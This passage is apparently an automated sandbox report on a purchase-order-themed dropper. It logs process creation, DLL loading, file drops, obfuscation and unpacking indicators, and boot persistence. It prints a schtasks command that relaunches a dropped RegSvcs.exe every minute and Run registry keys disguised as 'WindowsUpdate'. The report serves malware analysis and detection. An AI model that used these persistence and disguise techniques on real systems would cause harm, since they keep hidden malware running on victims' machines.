Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,7789945920983853701,11701749339926702711,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: wsock32.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: version.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: winmm.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: mpr.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: wininet.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: userenv.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: uxtheme.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: windows.storage.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: wldp.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: ntmarta.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: wsock32.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: version.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: winmm.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: mpr.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: wininet.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: userenv.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: uxtheme.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: windows.storage.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: wldp.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\PO3311926.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 Jump to behavior
Source: Slides.lnk.32.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.32.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.32.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.32.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.32.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.32.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: PO3311926.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PO3311926.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PO3311926.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PO3311926.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PO3311926.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PO3311926.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: PO3311926.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: PO3311926.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PO3311926.exe
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000012.00000000.1618125774.0000000000D32000.00000002.00000001.01000000.0000000D.sdmp, RegSvcs.exe.15.dr
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000012.00000000.1618125774.0000000000D32000.00000002.00000001.01000000.0000000D.sdmp, RegSvcs.exe.15.dr
Source: PO3311926.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PO3311926.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PO3311926.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PO3311926.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PO3311926.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, Helper.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, Helper.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, Helper.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, Helper.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00595D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 8_2_00595D78
File is packed with WinRar
Source: C:\Users\user\Desktop\PO3311926.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_3940265 Jump to behavior
PE file contains sections with non-standard names
Source: PO3311926.exe Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BBF640 push ecx; ret 0_2_00BBF653
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BBEB78 push eax; ret 0_2_00BBEB96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005E0332 push edi; ret 8_2_005E0333
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005B0E06 push ecx; ret 8_2_005B0E19
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005ADBF6 push cs; iretd 8_2_005ADBFD
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AB0332 push edi; ret 20_2_00AB0333
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A80E06 push ecx; ret 20_2_00A80E19
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A7DBFC push cs; iretd 20_2_00A7DBFD
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A7DC00 push eax; iretd 20_2_00A7DC01

Persistence and Installation Behavior
barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin File created: C:\Users\user\wrse\sdadbtvsh.bin Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File created: C:\Users\user\AppData\Roaming\RegSvcs.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin File created: C:\Users\user\wrse\sdadbtvsh.bin.exe Jump to dropped file
Source: C:\Users\user\Desktop\PO3311926.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin File created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegSvcs Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe"
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegSvcs Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegSvcs Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_006225A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 8_2_006225A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005AFC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 8_2_005AFC8A
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AF25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 20_2_00AF25A0
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A7FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 20_2_00A7FC8A
Source: C:\Users\user\Desktop\PO3311926.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
